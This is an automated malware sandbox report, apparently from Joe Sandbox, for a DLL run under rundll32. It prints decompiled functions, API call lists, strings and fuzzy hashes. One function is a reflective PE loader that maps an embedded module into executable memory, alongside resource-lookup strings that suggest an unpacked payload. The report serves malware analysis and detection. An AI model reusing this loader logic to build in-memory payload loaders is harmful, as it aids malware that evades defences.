ShowWindow.USER32(00000000,00000000), ref: 1000200D
ShowWindow.USER32(00000000,00000000), ref: 10002011
ShowWindow.USER32(00000000,00000000), ref: 10002015
ShowWindow.USER32(00000000,00000000), ref: 10002019
ShowWindow.USER32(00000000,00000000), ref: 1000201D
ShowWindow.USER32(00000000,00000000), ref: 10002021
ShowWindow.USER32(00000000,00000000), ref: 10002025
ShowWindow.USER32(00000000,00000000), ref: 10002029
ShowWindow.USER32(00000000,00000000), ref: 1000202D
ShowWindow.USER32(00000000,00000000), ref: 10002031
ShowWindow.USER32(00000000,00000000), ref: 10002035
ShowWindow.USER32(00000000,00000000), ref: 10002039
ShowWindow.USER32(00000000,00000000), ref: 1000203D
ShowWindow.USER32(00000000,00000000), ref: 10002041
ShowWindow.USER32(00000000,00000000), ref: 10002045
ShowWindow.USER32(00000000,00000000), ref: 10002049
ShowWindow.USER32(00000000,00000000), ref: 1000204D
ShowWindow.USER32(00000000,00000000), ref: 10002051
ShowWindow.USER32(00000000,00000000), ref: 10002055
ShowWindow.USER32(00000000,00000000), ref: 10002059
ShowWindow.USER32(00000000,00000000), ref: 1000205D
ShowWindow.USER32(00000000,00000000), ref: 10002061
ShowWindow.USER32(00000000,00000000), ref: 10002065
ShowWindow.USER32(00000000,00000000), ref: 10002069
ShowWindow.USER32(00000000,00000000), ref: 1000206D
ShowWindow.USER32(00000000,00000000), ref: 10002071
ShowWindow.USER32(00000000,00000000), ref: 10002075
ShowWindow.USER32(00000000,00000000), ref: 10002079
ShowWindow.USER32(00000000,00000000), ref: 1000207D
ShowWindow.USER32(00000000,00000000), ref: 10002081
ShowWindow.USER32(00000000,00000000), ref: 10002085
ShowWindow.USER32(00000000,00000000), ref: 10002089
ShowWindow.USER32(00000000,00000000), ref: 1000208D
ShowWindow.USER32(00000000,00000000), ref: 10002091
ShowWindow.USER32(00000000,00000000), ref: 10002095
ShowWindow.USER32(00000000,00000000), ref: 10002099
ShowWindow.USER32(00000000,00000000), ref: 1000209D
ShowWindow.USER32(00000000,00000000), ref: 100020A1
ShowWindow.USER32(00000000,00000000), ref: 100020A5
ShowWindow.USER32(00000000,00000000), ref: 100020A9
ShowWindow.USER32(00000000,00000000), ref: 100020AD
ShowWindow.USER32(00000000,00000000), ref: 100020B1
ShowWindow.USER32(00000000,00000000), ref: 100020B5
ShowWindow.USER32(00000000,00000000), ref: 100020B9
ShowWindow.USER32(00000000,00000000), ref: 100020BD
ShowWindow.USER32(00000000,00000000), ref: 100020C1
ShowWindow.USER32(00000000,00000000), ref: 100020C5
LdrAccessResource.NTDLL(10000000,?,?,?), ref: 100020DB
WriteFileGather.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 100020E6
VirtualAlloc.KERNELBASE(00000000,?,00000000,00000000), ref: 10002119
MessageBoxA.USER32 ref: 10002172

Strings

ntdll.dll, xrefs: 10001EC2
MFC42.DLL, xrefs: 10001EAA
LdrAccessResource, xrefs: 10001EFE
Control_RunDLL, xrefs: 10002159
k1>@dY0V<o)afFNz7v68r^Kn6)h)OGcSc, xrefs: 10002133
LdrFindResource_U, xrefs: 10001EDD, 10001EE4, 10001EEB

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ShowWindow$AddressAllocLibraryLoadProcVirtual$AccessCurrentFileFindGatherMessageNumaProcessResourceResource_Write_strlen
String ID: Control_RunDLL$LdrAccessResource$LdrFindResource_U$MFC42.DLL$k1>@dY0V<o)afFNz7v68r^Kn6)h)OGcSc$ntdll.dll
API String ID: 1083314109-3402274389
Opcode ID: 554e6fde4c1d1f79f28124b122aaa560f5ca8abd828a0db746064c1df19a2dc9
Instruction ID: cb1ea1c1361b03dfa0b29133f2aa3901bb47fc6e60d4c354bfdb6088dc7855a5
Opcode Fuzzy Hash: 554e6fde4c1d1f79f28124b122aaa560f5ca8abd828a0db746064c1df19a2dc9
Instruction Fuzzy Hash: 7A9116E1D0022C7EF621ABB28DC9DBF6E6CDE051E8B512817B50A921129E389D05CEF4

Uniqueness

Uniqueness Score: -1.00%

Function 1000288D, Relevance: 15.2, APIs: 10, Instructions: 209
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E1000288D(intOrPtr __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v44;
				char _v48;
				void* _t75;
				void* _t81;
				long _t83;
				void* _t94;
				void* _t97;
				void* _t98;
				intOrPtr _t103;
				void* _t105;
				signed int _t110;
				void* _t113;
				void* _t116;
				intOrPtr* _t119;
				void* _t123;
				intOrPtr _t131;
				void* _t133;
				signed int _t135;
				intOrPtr* _t137;
				intOrPtr* _t138;
				signed int _t139;
				long _t142;
				long _t143;
				void* _t145;

				_v8 = _v8 & 0x00000000;
				_t144 = __ecx;
				_v12 = __ecx;
				if(E100023BA(_a8, 0x40) == 0) {
					L35:
					return 0;
				}
				_t138 = _a4;
				if( *_t138 != 0x5a4d) {
					L33:
					_push(0xc1);
					L34:
					SetLastError();
					goto L35;
				}
				if(E100023BA(_a8,  *((intOrPtr*)(_t138 + 0x3c)) + 0xf8) == 0) {
					goto L35;
				}
				_t119 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
				if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 4)) != 0x14c || ( *(_t119 + 0x38) & 0x00000001) != 0) {
					goto L33;
				} else {
					_t139 =  *(_t119 + 6) & 0x0000ffff;
					_t75 = ( *(_t119 + 0x14) & 0x0000ffff) + 0x24;
					if(_t139 == 0) {
						L10:
						_push( &_v48); // executed
						L10002CBC(); // executed
						_t122 = _v44;
						_t25 = _t122 - 1; // -1
						_t26 = _t122 - 1; // -1
						_t135 =  !_t25;
						_t142 = _t26 +  *((intOrPtr*)(_t119 + 0x50)) & _t135;
						if(_t142 != (_v8 - 0x00000001 + _v44 & _t135)) {
							goto L33;
						}
						_t81 = VirtualAlloc( *(_t119 + 0x34), _t142, 0x3000, 4); // executed
						_v8 = _t81;
						if(_t81 != 0) {
							L14:
							_t83 = HeapAlloc(GetProcessHeap(), 8, 0x34);
							_t123 = _v8;
							_t143 = _t83;
							if(_t143 != 0) {
								 *(_t143 + 4) = _t123;
								 *(_t143 + 0x14) = ( *(_t119 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
								 *((intOrPtr*)(_t143 + 0x1c)) = _a12;
								 *((intOrPtr*)(_t143 + 0x20)) = _a16;
								 *((intOrPtr*)(_t143 + 0x24)) = _a20;
								 *((intOrPtr*)(_t143 + 0x28)) = _a24;
								 *((intOrPtr*)(_t143 + 0x30)) = _v44;
								if(E100023BA(_a8,  *(_t119 + 0x54)) == 0) {
									L28:
									E100026C0(_t143);
									goto L35;
								}
								_t94 = VirtualAlloc(_v8,  *(_t119 + 0x54), 0x1000, 4); // executed
								_t145 = _t94;
								E10002C22(_t145, _a4,  *(_t119 + 0x54));
								_t97 =  *((intOrPtr*)(_a4 + 0x3c)) + _t145;
								_t144 = _v12;
								 *_t143 = _t97;
								 *((intOrPtr*)(_t97 + 0x34)) = _v8;
								_t98 = E100023D8(_v12, _a4, _a8, _t119, _t143); // executed
								if(_t98 == 0) {
									goto L28;
								}
								_t101 =  *((intOrPtr*)( *_t143 + 0x34)) ==  *(_t119 + 0x34);
								if( *((intOrPtr*)( *_t143 + 0x34)) ==  *(_t119 + 0x34)) {
									_t103 = 1;
								} else {
									_t103 = E10002B68(_t144, _t143, _t101);
								}
								 *((intOrPtr*)(_t143 + 0x18)) = _t103;
								if(E1000225B(_t143) != 0) {
									_t105 = E10002591(_t144, _t143); // executed
									if(_t105 != 0 && E100024BD(_t143) != 0) {
										_t131 =  *((intOrPtr*)( *_t143 + 0x28));
										if(_t131 == 0) {
											 *(_t143 + 0x2c) =  *(_t143 + 0x2c) & 0x00000000;
											L32:
											return _t143;
										}
										_t110 = _v8 + _t131;
										if( *(_t143 + 0x14) == 0) {
											 *(_t143 + 0x2c) = _t110;
											goto L32;
										}
										_push(0);
										_push(1);
										_push(0x10000000);
										if( *_t110() != 0) {
											 *((intOrPtr*)(_t143 + 0x10)) = 1;
											goto L32;
										}
										SetLastError(0x45a);
									}
								}
								goto L28;
							}
							VirtualFree(_t123, _t83, 0x8000);
							L13:
							_push(0xe);
							goto L34;
						}
						_t113 = VirtualAlloc(_t81, _t142, 0x3000, 4); // executed
						_v8 = _t113;
						if(_t113 != 0) {
							goto L14;
						}
						goto L13;
					}
					_t133 = _v8;
					_t137 = _t75 + _t119;
					do {
						_t115 =  !=  ?  *((void*)(_t137 + 4)) :  *(_t119 + 0x38);
						_t116 = ( !=  ?  *((void*)(_t137 + 4)) :  *(_t119 + 0x38)) +  *_t137;
						_t137 = _t137 + 0x28;
						_t117 =  <=  ? _t133 : _t116;
						_t133 =  <=  ? _t133 : _t116;
						_t139 = _t139 - 1;
					} while (_t139 != 0);
					_v8 = _t133;
					goto L10;
				}
			}

APIs

Part of subcall function 100023BA: SetLastError.KERNEL32(0000000D,?,100028A9,10002159,00000040,10042344,00000000,00000000,10002857,00000000,10002159,10002B5A,10002B49,10002B3B,00000000), ref: 100023C7

GetNativeSystemInfo.KERNEL32(10002857), ref: 1000293F
VirtualAlloc.KERNELBASE(?,?,00003000,00000004,10002159,?,10002159,00000040,10042344,00000000,00000000,10002857,00000000,10002159,10002B5A,10002B49), ref: 1000296F
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,10002159,00000000), ref: 10002985
GetProcessHeap.KERNEL32(00000008,00000034,?,10002159,00000000), ref: 1000299D
HeapAlloc.KERNEL32(00000000,?,10002159,00000000), ref: 100029A4
VirtualFree.KERNEL32(00000000,00000000,00008000,?,10002159,00000000), ref: 100029BA
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,10002159,?,?,10002159,00000000), ref: 10002A12
und_memcpy.LIBVCRUNTIME ref: 10002A21
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,10002159,00000000), ref: 10002AB4

Part of subcall function 100026C0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,10002AC2,00000000,10002159,?,?,10002159,00000000), ref: 10002726
Part of subcall function 100026C0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,10002AC2,00000000,10002159,?,?,10002159,00000000), ref: 1000272E
Part of subcall function 100026C0: HeapFree.KERNEL32(00000000,?,10002AC2), ref: 10002735

SetLastError.KERNEL32(000000C1,10002159,00000040,10042344,00000000,00000000,10002857,00000000,10002159,10002B5A,10002B49,10002B3B,00000000,?,10002159,00000000), ref: 10002ADF

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Virtual$AllocHeap$ErrorFreeLast$Process$InfoNativeSystemund_memcpy
String ID:
API String ID: 4093005746-0
Opcode ID: 0ab2a250ca3eac1d39a73b9ac0c12bbbcad5e6a5782c7eb362b19a931988e4eb
Instruction ID: d3499257f24b97b58dc88dd86fbd14561d56403c03c55b35f455527c3641d1ca
Opcode Fuzzy Hash: 0ab2a250ca3eac1d39a73b9ac0c12bbbcad5e6a5782c7eb362b19a931988e4eb
Instruction Fuzzy Hash: 4A71AA71700206AFEB15CF68CD80B59BBF5FF49784F118018E905DB68ADB74EA90CB95

Uniqueness

Uniqueness Score: -1.00%

Function 10003A92, Relevance: 12.1, APIs: 8, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E10003A92(void* __edx) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t57;
				void* _t60;
				void* _t67;
				signed int _t70;
				void* _t73;
				signed int _t74;
				signed int _t78;
				void* _t80;

				_t67 = __edx;
				_push(0x10);
				_push(0x1004af08);
				E100040F0();
				_t34 =  *0x1004dc68; // 0x0
				if(_t34 > 0) {
					 *0x1004dc68 = _t34 - 1;
					 *(_t80 - 0x1c) = 1;
					 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
					 *((char*)(_t80 - 0x20)) = E100034F1();
					 *(_t80 - 4) = 1;
					__eflags =  *0x1004dc44 - 2;
					if( *0x1004dc44 != 2) {
						E10003EE0(_t67, 1, _t73, 7);
						asm("int3");
						_push(0xc);
						_push(0x1004af30);
						E100040F0();
						_t70 =  *(_t80 + 0xc);
						__eflags = _t70;
						if(_t70 != 0) {
							L9:
							 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
							__eflags = _t70 - 1;
							if(_t70 == 1) {
								L12:
								_t57 =  *(_t80 + 0x10);
								_t74 = E10003C4D( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
								 *(_t80 - 0x1c) = _t74;
								__eflags = _t74;
								if(_t74 != 0) {
									_t41 = E10003938(_t60,  *((intOrPtr*)(_t80 + 8)), _t70, _t57); // executed
									_t74 = _t41;
									 *(_t80 - 0x1c) = _t74;
									__eflags = _t74;
									if(_t74 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t70 - 2;
								if(_t70 == 2) {
									goto L12;
								} else {
									_t57 =  *(_t80 + 0x10);
									L14:
									_push(_t57);
									_push(_t70);
									_push( *((intOrPtr*)(_t80 + 8)));
									_t42 = E10004518();
									_t74 = _t42;
									 *(_t80 - 0x1c) = _t74;
									__eflags = _t70 - 1;
									if(_t70 == 1) {
										__eflags = _t74;
										if(_t74 == 0) {
											_push(_t57);
											_push(_t42);
											_push( *((intOrPtr*)(_t80 + 8)));
											_t45 = E10004518();
											__eflags = _t57;
											_t25 = _t57 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E10003A92(_t67);
											_pop(_t60);
											E10003C4D( *((intOrPtr*)(_t80 + 8)), _t74, _t57);
										}
									}
									__eflags = _t70;
									if(_t70 == 0) {
										L19:
										_t74 = E10003938(_t60,  *((intOrPtr*)(_t80 + 8)), _t70, _t57);
										 *(_t80 - 0x1c) = _t74;
										__eflags = _t74;
										if(_t74 != 0) {
											_t74 = E10003C4D( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
											 *(_t80 - 0x1c) = _t74;
										}
									} else {
										__eflags = _t70 - 3;
										if(_t70 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t80 - 4) = 0xfffffffe;
							_t40 = _t74;
						} else {
							__eflags =  *0x1004dc68 - _t70; // 0x0
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
						return _t40;
					} else {
						E100035BC(_t60);
						E1000452A();
						E10004591();
						 *0x1004dc44 =  *0x1004dc44 & 0x00000000;
						 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
						E10003B27();
						_t54 = E1000375D( *((intOrPtr*)(_t80 + 8)), 0);
						asm("sbb esi, esi");
						_t78 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t78;
						 *(_t80 - 0x1c) = _t78;
						 *(_t80 - 4) = 0xfffffffe;
						E10003B34();
						_t56 = _t78;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
					return _t56;
				}
			}

APIs

__RTC_Initialize.LIBCMT ref: 10003AD9
___scrt_uninitialize_crt.LIBCMT ref: 10003AF3

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 7a051707ff0741b05a1ee3ce02520a6e0ff3268bbec48c4d0bc0eb2efb0be8cb
Instruction ID: 7bfdc372d2ca72936bd1731edce63cf54240d63550fca9bbaf8a272257527a9e
Opcode Fuzzy Hash: 7a051707ff0741b05a1ee3ce02520a6e0ff3268bbec48c4d0bc0eb2efb0be8cb
Instruction Fuzzy Hash: 8C41C272D04669ABFB22DF59CC41BAF7BACEB816D5F11C11AF804A715AC7705E01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10029C50, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10029C50(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t13;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x1004e548 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x10045368 + _t22 * 4);
						_t13 = LoadLibraryExW(_t23, 0, 0x800); // executed
						_t32 = _t13;
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E10023828(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E10023828(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

Strings

api-ms-, xrefs: 10029CA7
ext-ms-, xrefs: 10029CBB

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 00ca16b444452de063b7c347b4828efdadee3ad1140b3dd23fdb962c2a8c0164
Instruction ID: 9a454b55204e61d5b080d74c5da724d9454356f1e041ce2ebe6f9b52f1a9641a
Opcode Fuzzy Hash: 00ca16b444452de063b7c347b4828efdadee3ad1140b3dd23fdb962c2a8c0164
Instruction Fuzzy Hash: 44218471A05261BBDB21CB64ED84A4E77D8EF427E1FB20121ED46E7291E770ED00D6E4

Uniqueness

Uniqueness Score: -1.00%

Function 1000D67D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000D67D(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x1004e034 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x100438d8 + _t11 * 4);
						_v8 = _t12;
						_t13 = LoadLibraryExW(_t12, 0, 0x800); // executed
						_t29 = _t13;
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E10023828(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

APIs

FreeLibrary.KERNEL32(00000000,?,?,1000D73E,00000000,?,00000001,00000000,?,1000D871,00000001,FlsFree,10043994,FlsFree,00000000), ref: 1000D70D

Strings

api-ms-, xrefs: 1000D6CD

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: bda9a083905e9972f6869984c368c17e2cf1144b0b7e5e1f4797190f804308a2
Instruction ID: 65af02aee665ade10d00ef86524baa454b466fb1c62f40754c56af64b2f9aaab
Opcode Fuzzy Hash: bda9a083905e9972f6869984c368c17e2cf1144b0b7e5e1f4797190f804308a2
Instruction Fuzzy Hash: 0C119431A01666ABEB21EB689C8474D37D4DF027E0F120122EA18EB284E661ED0086E5

Uniqueness

Uniqueness Score: -1.00%

Function 10003B42, Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E10003B42(void* __edx) {
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t34;
				void* _t36;
				void* _t39;
				intOrPtr _t40;
				intOrPtr _t42;
				void* _t44;
				void* _t48;

				_t39 = __edx;
				_push(0xc);
				_push(0x1004af30);
				E100040F0();
				_t40 =  *((intOrPtr*)(_t44 + 0xc));
				if(_t40 != 0) {
					L3:
					 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
					if(_t40 == 1 || _t40 == 2) {
						_t34 =  *((intOrPtr*)(_t44 + 0x10));
						_t42 = E10003C4D( *((intOrPtr*)(_t44 + 8)), _t40, _t34);
						 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
						if(_t42 != 0) {
							_t25 = E10003938(_t36,  *((intOrPtr*)(_t44 + 8)), _t40, _t34); // executed
							_t42 = _t25;
							 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
							if(_t42 != 0) {
								goto L8;
							}
						}
					} else {
						_t34 =  *((intOrPtr*)(_t44 + 0x10));
						L8:
						_push(_t34);
						_push(_t40);
						_push( *((intOrPtr*)(_t44 + 8)));
						_t26 = E10004518();
						_t42 = _t26;
						 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
						if(_t40 == 1 && _t42 == 0) {
							_push(_t34);
							_push(_t26);
							_push( *((intOrPtr*)(_t44 + 8)));
							_push((E10004518() & 0xffffff00 | _t34 != 0x00000000) & 0x000000ff);
							E10003A92(_t39);
							_pop(_t36);
							E10003C4D( *((intOrPtr*)(_t44 + 8)), _t42, _t34);
						}
						if(_t40 == 0 || _t40 == 3) {
							_t42 = E10003938(_t36,  *((intOrPtr*)(_t44 + 8)), _t40, _t34);
							 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
							if(_t42 != 0) {
								_t42 = E10003C4D( *((intOrPtr*)(_t44 + 8)), _t40, _t34);
								 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
							}
						}
					}
					 *(_t44 - 4) = 0xfffffffe;
					_t24 = _t42;
				} else {
					_t48 =  *0x1004dc68 - _t40; // 0x0
					if(_t48 > 0) {
						goto L3;
					} else {
						_t24 = 0;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0x10));
				return _t24;
			}

APIs

dllmain_raw.LIBCMT ref: 10003B7F
dllmain_crt_dispatch.LIBCMT ref: 10003B96
dllmain_raw.LIBCMT ref: 10003BDE
dllmain_crt_dispatch.LIBCMT ref: 10003BF1
dllmain_raw.LIBCMT ref: 10003C04

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 81fff7e8ddae1b90393eaad18b17aae06b2df87e031cee5e04bcccc407ad455a
Instruction ID: a8148dc8121538fd3aaffcd9e8ee1bf724536045b9f1c5fcd83538124af9b725
Opcode Fuzzy Hash: 81fff7e8ddae1b90393eaad18b17aae06b2df87e031cee5e04bcccc407ad455a
Instruction Fuzzy Hash: 8F21A171D01659ABFB23DE15CC41E6F7BACEB81AD4B02C125FC05A7219C7319E018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001A7D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E10001A7D(intOrPtr _a4, intOrPtr _a8) {
				void* _t4;
				intOrPtr _t8;
				void* _t10;

				_push(0);
				_push(0x40);
				_push(0x3000);
				_push(_a8);
				_push(0);
				_t4 = GetCurrentProcess();
				_push(_t4); // executed
				L10002C92(); // executed
				_t8 =  *0x1004d028; // 0x0
				_t10 = _t4;
				_t9 =  !=  ? 0 : _t8;
				 *0x1004d028 =  !=  ? 0 : _t8;
				E100045C0(_t10, _a4, _a8);
				return _t10;
			}

0x10001a81
0x10001a83
0x10001a85
0x10001a8a
0x10001a8d
0x10001a8f
0x10001a95
0x10001a96
0x10001a9e
0x10001aa4
0x10001aae
0x10001ab1
0x10001ab7
0x10001ac3

APIs

GetCurrentProcess.KERNEL32(00000000,?,00003000,00000040,00000000,LdrFindResource_U,?,10001EF1,LdrFindResource_U,00000000,LdrFindResource_U), ref: 10001A8F
VirtualAllocExNuma.KERNEL32 ref: 10001A96

Strings

LdrFindResource_U, xrefs: 10001A80

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: AllocCurrentNumaProcessVirtual
String ID: LdrFindResource_U
API String ID: 346376999-1041023618
Opcode ID: 4c02bb6aea739f849601bb6fdcb21d7ba60705c9ec75e1d4b7f00a3d6f85dbfa
Instruction ID: d0a16a8f04b34dc33bb485e690be2f78af7230e4dc145071e4a6e5a959ba9fd3
Opcode Fuzzy Hash: 4c02bb6aea739f849601bb6fdcb21d7ba60705c9ec75e1d4b7f00a3d6f85dbfa
Instruction Fuzzy Hash: A2E04879B413247BEB215BA59C45F553F98DB097B1F004021FF0CDA291D571DD5087D8

Uniqueness

Uniqueness Score: -1.00%

Function 100316BB, Relevance: 4.7, APIs: 3, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
